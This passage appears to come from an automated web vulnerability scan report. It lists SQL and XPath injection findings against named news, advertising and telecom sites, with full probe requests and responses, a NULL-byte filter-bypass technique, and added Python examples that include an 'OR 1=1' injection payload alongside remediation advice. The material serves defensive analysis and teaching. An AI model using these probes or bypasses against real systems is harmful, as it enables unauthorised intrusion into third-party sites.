26.117. http://www.linkedin.com/countserv/count/share

26.118. https://www.linkedin.com/secure/login

26.119. http://www.myspace.com/Modules/PostTo/Pages/

26.120. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html

26.121. http://www.newslibrary.com/nlsearch.asp

26.122. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

26.123. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

26.124. http://www.sologig.com/

26.125. http://www.sprint.com/

26.126. https://www.sprint.net/

26.127. http://www.stumbleupon.com/submit

26.128. http://www.thatsracin.com/reg-bin/int.cgi

26.129. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html

26.130. http://www.tsn.ca/ncaa/story/

26.131. http://www.tulsaworld.com/site/articlepath.aspx

26.132. http://www.tumblr.com/share

26.133. http://www.usatoday.com/community/profile.htm

26.134. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

26.135. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

26.136. http://www.youtube.com/results

26.137. http://www.zvents.com/images/internal/5/6/5/2/img_13432565_thumb.jpg

27. Cacheable HTTPS response

27.1. https://cdns.gigya.com/gs/SafariIDsProxy.htm

27.2. https://maps-api-ssl.google.com/maps

27.3. https://observ.subscribeobserver.com/

27.4. https://socialize.gigya.com/gs/bookmark.aspx

27.5. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

27.6. https://www.sprint.net/

27.7. https://www.sprint.net/external_videos/pages.php

27.8. https://www.sprint.net/index.php

28. HTML does not specify charset

28.1. http://a.lingospot.com/pv_error/

28.2. http://a.tribalfusion.com/j.ad

28.3. http://ad.doubleclick.net/clk

28.4. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

28.5. http://api.js-kit.com/v1/count

28.6. http://c.brightcove.com/services/messagebroker/amf

28.7. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

28.8. https://cdns.gigya.com/gs/SafariIDsProxy.htm

28.9. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

28.10. http://content.usatoday.com/quickquestion/jquery/1.0.1.html

28.11. http://cti.w55c.net/ct/rubicon-cms2.html

28.12. http://grfx.cstv.com/schools/nd/data/xml/auctions/m-footbl.xml

28.13. http://grfx.cstv.com/schools/nd/graphics/nd-09-bsi-video.jpg

28.14. http://grfx.cstv.com/schools/nd/graphics/nd-09-btn-bsi-.gif

28.15. http://grfx.cstv.com/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

28.16. http://l1.zedo.com/log/p.html

28.17. http://links.industrybrains.com/click

28.18. http://nextelonline.nextel.com/tl/set_tl.html

28.19. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

28.20. http://pbid.pro-market.net/engine

28.21. http://pixel.quantserve.com/seg/r

28.22. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

28.23. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html

28.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

28.25. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

28.26. http://video.od.visiblemeasures.com/log

28.27. http://www.charlotteobserver.com/search/

28.28. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html

28.29. http://www.newslibrary.com/nlsearch.asp

28.30. http://www.reuters.com/resources/r/

28.31. http://www.usatoday.com/community/profile.htm

28.32. http://www.usatoday.com/marketing/feedback.htm

28.33. http://www.usatoday.com/marketing/questions.htm

29. Content type incorrectly stated

29.1. http://ad.doubleclick.net/clk

29.2. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

29.3. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php

29.4. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json

29.5. http://d3fd89.r.axf8.net/mr/e.gif

29.6. http://espn.go.com/dallas/ncf/preview

29.7. http://goku.brightcove.com/1pix.gif

29.8. http://imp.fetchback.com/serve/fb/adtag.js

29.9. http://js.www.reuters.com/recommend/re/fp

29.10. http://media.charlotteobserver.com/static/dealsaver/widget/images/dealsaver_td_logo.png

29.11. http://mediacdn.disqus.com/1314991730/fonts/disqus-webfont.woff

29.12. http://rt.disqus.com/forums/realtime-cached.js

29.13. http://rt.legolas-media.com/lgrt

29.14. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

29.15. http://search.charlotteobserver.com/search-bin/search.pl.cgi

29.16. http://search2.sacbee.com/search-bin/search.pl.cgi

29.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

29.18. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

29.19. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

29.20. http://static.mcclatchyinteractive.com/creative/fns/widgets/images/deal_placeholder.jpg

29.21. http://trc.taboolasyndication.com/reuters/trc/2/json

29.22. http://urls.api.twitter.com/1/urls/count.json

29.23. http://video.od.visiblemeasures.com/log

29.24. http://www.facebook.com/extern/login_status.php

29.25. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js

29.26. http://www.reuters.com/assets/breakingNews

29.27. http://www.reuters.com/assets/info

29.28. http://www.reuters.com/assets/searchIntercept

29.29. http://www.reuters.com/assets/sharedModuleLoader

29.30. http://www.reuters.com/resources/r/

29.31. http://www.sprint.com/favicon.ico

29.32. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

30. Content type is not specified

30.1. http://load.tubemogul.com/core

30.2. http://pcm3.map.pulsemgr.com/uds/pc



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://d3fd89.r.axf8.net/mr/e.gif [a parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://d3fd89.r.axf8.net
Path:   /mr/e.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
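
The following is an added example, not code from the report or from the site operator, that shows both the remediation advice above (string concatenation beside a parameterised query) and the single-quote / double-quote heuristic the issue detail describes. It uses an in-memory SQLite database in place of the real backend; the table, its columns and the mapping of the "a" parameter to a site id are assumptions, since the report shows only an IIS/ASP.NET endpoint and its responses, not the schema.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database standing in for the
# backend behind /mr/e.gif. The table, its columns and the mapping of the
# "a" query parameter to a site id are assumptions; the report shows only an
# IIS/ASP.NET endpoint and its responses, not the schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sites (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO sites VALUES (?, ?)",
                     [("D3FD89", "Sacbee"), ("A1B2C3", "Other")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, site_id):
    """Builds the query by string concatenation, so the value of 'a'
    becomes part of the SQL text and can change the query's structure."""
    sql = "SELECT name FROM sites WHERE id = '" + site_id + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, site_id):
    """Fixes the query structure first and binds the value separately;
    the driver never interprets the value as SQL."""
    return conn.execute("SELECT name FROM sites WHERE id = ?",
                        (site_id,)).fetchall()


def probe(conn, lookup, base="D3FD89"):
    """Reproduces the scanner heuristic from the report: submit the value
    with one trailing quote, then with two. Returns a pair of booleans,
    (error_on_one_quote, error_on_two_quotes). The pattern (True, False)
    is what the report observed: a lone quote leaves the string literal
    unterminated, while a doubled quote is a valid escaped quote inside it."""
    outcome = []
    for payload in (base + "'", base + "''"):
        try:
            lookup(conn, payload)
            outcome.append(False)
        except sqlite3.DatabaseError:
            outcome.append(True)
    return tuple(outcome)


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", probe(db, lookup_vulnerable))      # (True, False)
    print("parameterised:", probe(db, lookup_parameterised))  # (False, False)
    # With concatenation the payload reaches the WHERE clause and widens it
    # to every row; with binding it is simply an id that matches nothing.
    print(lookup_vulnerable(db, "x' OR '1'='1"))
    print(lookup_parameterised(db, "x' OR '1'='1"))
```

The (True, False) pattern is only a hint, as the report's "Tentative" confidence indicates: any code path that fails on an unbalanced quote and succeeds on a doubled one (a JSON or JavaScript string builder, for instance) produces the same signature. Confirming the finding means reading the 500 response body, which here is a generic ASP.NET "Runtime Error" page with the detail suppressed, or demonstrating an actual change in query behaviour such as the OR payload above.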

Request 1

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A258447044937878%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ASacbee%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89'&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:59:22 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A258447044937878%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ASacbee%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89''&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 37
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:59:23 GMT

gomez.b3(0,0);if(gomez.n0)gomez.n0();

1.2. http://ib.adnxs.com/getuidnb [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ib.adnxs.com
Path:   /getuidnb

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header and a generic error response was returned; two single quotes were then submitted and the error disappeared. Treat this as a behavioural differential only: Response 1 below is an HTTP 500 with an empty body ("No url" in the status line) and Response 2 a 302, so there is no database error text to inspect, and any quote-sensitive parser handling the Referer value would produce the same pattern. Review the application's handling of this and other input to confirm whether a vulnerability is present.

The scanner reports that a bare single quote is blocked, but that the block is circumvented by submitting a URL-encoded NULL byte (%00) before the blocked characters: the filter evidently stops reading at the NULL byte while the application behind it receives the full value.

Remediation detail

NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) or input filter written in native code, where a string ends at the first NULL byte: the filter inspects only the bytes before %00 while the application behind it processes the whole value. Fix the actual vulnerability within the application code (bind user input as query parameters rather than building SQL from strings) and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /getuidnb HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 500 No url
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 0
Connection: close

Request 2

GET /getuidnb HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Location: P.T
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 0
Connection: close


1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

Issue detail

REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in REST URL parameter 5 and a general error response was returned; two single quotes were then submitted and the error disappeared. Note what the two responses below actually are: both are HTTP 404s from the Omniture DC collector, differing only in that the first carries an ErrorDocument body and the second an empty one. Neither contains database error text, so the differential is weak evidence; review the application's handling of this and other input before treating the finding as confirmed.

The scanner reports that a bare single quote is blocked, but that the block is circumvented by submitting a URL-encoded NULL byte (%00) before the blocked characters.

Remediation detail

NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) or input filter written in native code, where a string ends at the first NULL byte: the filter inspects only the bytes before %00 while the application behind it processes the whole value. Fix the actual vulnerability within the application code (bind user input as query parameters rather than building SQL from strings) and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
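The following is an added, runnable illustration of the differential test and the NULL-byte bypass described in 1.2 and 1.3; it is example code written for this page, not code from the scanned hosts. The in-memory SQLite table, the C-style filter model and the application's handling of the NULL byte are all assumptions, chosen only to show the filter and the application disagreeing about the same input.

```python
import sqlite3

# Constructed stand-in for whatever the scanned hosts query (assumption).
DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.execute("CREATE TABLE hits (referer TEXT)")
DB.execute("INSERT INTO hits VALUES ('http://www.google.com/')")
DB.commit()


def native_filter_blocks(value):
    """Model of a filter written in C: it reads the value as a C string,
    so everything after the first NUL byte is invisible to it (assumption
    about the unseen filter; this is the behaviour the report describes)."""
    visible = value.split("\x00", 1)[0]
    return "'" in visible


def _app_view(value):
    """The managed application behind the filter sees the whole value.
    Here it drops the NUL byte before use (assumption: what a given stack
    does with an embedded NUL varies; the point is only that the filter
    and the application do not see the same string)."""
    return value.replace("\x00", "")


def query_vulnerable(referer):
    """String-built SQL. Returns the coarse outcome an HTTP client would
    observe: 'blocked' (filter), 'error' (generic 500) or 'ok'."""
    if native_filter_blocks(referer):
        return "blocked"
    sql = f"SELECT count(*) FROM hits WHERE referer = '{_app_view(referer)}'"
    try:
        DB.execute(sql).fetchone()
    except sqlite3.OperationalError:   # e.g. unrecognized token: "'"
        return "error"
    return "ok"


def query_parameterized(referer):
    """The actual fix: the value is bound, never parsed as SQL, so a quote
    (with or without a leading NUL) is just data."""
    if native_filter_blocks(referer):
        return "blocked"
    DB.execute("SELECT count(*) FROM hits WHERE referer = ?",
               (_app_view(referer),)).fetchone()
    return "ok"


def differential(query_fn, prefix=""):
    """The scanner's heuristic from 1.2/1.3: submit ' then '' (already
    URL-decoded here; on the wire they were %00' and %00'') and compare.
    An ('error', 'ok') pair is the SQL-injection signal; anything else is
    not. The same pair can be produced by any quote-sensitive parser that
    is not a database, which is why the findings above stay 'Tentative'
    until the error text itself is inspected."""
    return tuple(query_fn(prefix + probe) for probe in ("'", "''"))
```

Against query_vulnerable the bare probes come back ("blocked", "blocked"), the NUL-prefixed probes ("error", "ok"), which is the pattern the scanner keyed on; against query_parameterized the NUL-prefixed probes come back ("ok", "ok") because the quote never reaches the SQL parser.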

Request 1

GET /b/ss/sprintuniversalsiteprod/1/H.22.1%00'/s88955233080778?AQB=1&pccr=true&vidn=273164E305162D78-600001A660177E59&&ndh=1&t=3%2F8%2F2011%2019%3A44%3A28%206%20300&ce=UTF-8&pageName=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&g=http%3A%2F%2Fwww.sprint.com%2F&r=http%3A%2F%2Fwww.sprint.com%2F&cc=USD&ch=Home%20Page&server=www.sprint.com&h1=Home%20Page%7CHP%20%3A%20IHP&h2=D%3Dg&c3=Interstitial%20Home%20Page&c4=HP%20%3A%20IHP&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&v29=D%3Dc43&v30=D%3Dch&c40=D%3Dc4&c42=Shockwave%20Flash%2010.3%20r183&c43=www.sprint.com&v44=105E1B5AD68B10D605E2BDF5FE0A4306&c45=Home%20Page%2BHP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&c46=7%3A30PM&c47=Saturday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:02:30 GMT
Server: Omniture DC/2.0.0
Content-Length: 433
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/sprintuniversalsiteprod/1/H.22.1 was not found
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/sprintuniversalsiteprod/1/H.22.1%00''/s88955233080778?AQB=1&pccr=true&vidn=273164E305162D78-600001A660177E59&&ndh=1&t=3%2F8%2F2011%2019%3A44%3A28%206%20300&ce=UTF-8&pageName=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&g=http%3A%2F%2Fwww.sprint.com%2F&r=http%3A%2F%2Fwww.sprint.com%2F&cc=USD&ch=Home%20Page&server=www.sprint.com&h1=Home%20Page%7CHP%20%3A%20IHP&h2=D%3Dg&c3=Interstitial%20Home%20Page&c4=HP%20%3A%20IHP&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&v29=D%3Dc43&v30=D%3Dch&c40=D%3Dc4&c42=Shockwave%20Flash%2010.3%20r183&c43=www.sprint.com&v44=105E1B5AD68B10D605E2BDF5FE0A4306&c45=Home%20Page%2BHP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&c46=7%3A30PM&c47=Saturday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:02:30 GMT
Server: Omniture DC/2.0.0
xserver: www625
Content-Length: 0
Content-Type: text/html


2. XPath injection
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
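As an added example (not code from the scanned site or from the scanner), the following reproduces the error oracle used in 2.1 and 2.2 and the two remediations above. The XML document, element names and the shape of the expression are assumptions; the real expression behind the usatoday URLs is not visible in the report. Python's xml.etree stands in for the ASP.NET XPath API: it raises SyntaxError where .NET raises XPathException, but the signal is the same.

```python
import re
import xml.etree.ElementTree as ET

# Constructed document standing in for the content store behind the
# scanned URLs (assumption; the real XML and expression are not visible).
USERS_XML = """<users>
  <user name="alice" role="admin"/>
  <user name="bob" role="reader"/>
</users>"""
ROOT = ET.fromstring(USERS_XML)


def lookup_vulnerable(name):
    """Builds the predicate by string concatenation, as the ASP.NET code
    in section 2 evidently does. A single quote in `name` ends the string
    literal early and the XPath parser rejects the whole expression; that
    exception is the oracle the scanner reported ("This is an unclosed
    string" from XPathScanner.ScanString)."""
    return [u.get("role") for u in ROOT.findall(f"./user[@name='{name}']")]


NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_safe_name(value):
    """Allowlist from the remediation text above: short alphanumeric
    strings only, which excludes every XPath metacharacter."""
    return NAME_RE.fullmatch(value) is not None


def lookup_validated(name):
    """Same query builder, but user data only reaches it after the allowlist."""
    if not is_safe_name(name):
        raise ValueError("name rejected by allowlist")
    return [u.get("role") for u in ROOT.findall(f"./user[@name='{name}']")]


def lookup_without_expression(name):
    """Stronger still: never let user data become part of the expression.
    Walk the nodes and compare in code, so a quote is just a character."""
    return [u.get("role") for u in ROOT.iter("user") if u.get("name") == name]


def raises_xpath_error(lookup, value):
    """Reproduces the scanner's check: does this input make the query
    compiler throw? Only the parser error counts; an allowlist rejection
    (ValueError) is the application refusing the input, not a bug."""
    try:
        lookup(value)
    except SyntaxError:
        return True
    return False
```

The trailing quote in the REST segment of 2.1 and 2.2 corresponds to calling lookup_vulnerable with a value ending in a single quote; the validated and expression-free variants return a rejection or an empty result respectively, and neither lets the parser see the quote.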


2.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The same quote placed in REST URL parameter 3 (2.2 below) produces an identical response, down to the Content-Length, which suggests the whole request path, rather than one segment, is built into the expression.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry'/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:30 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

2.2. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry/post'/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
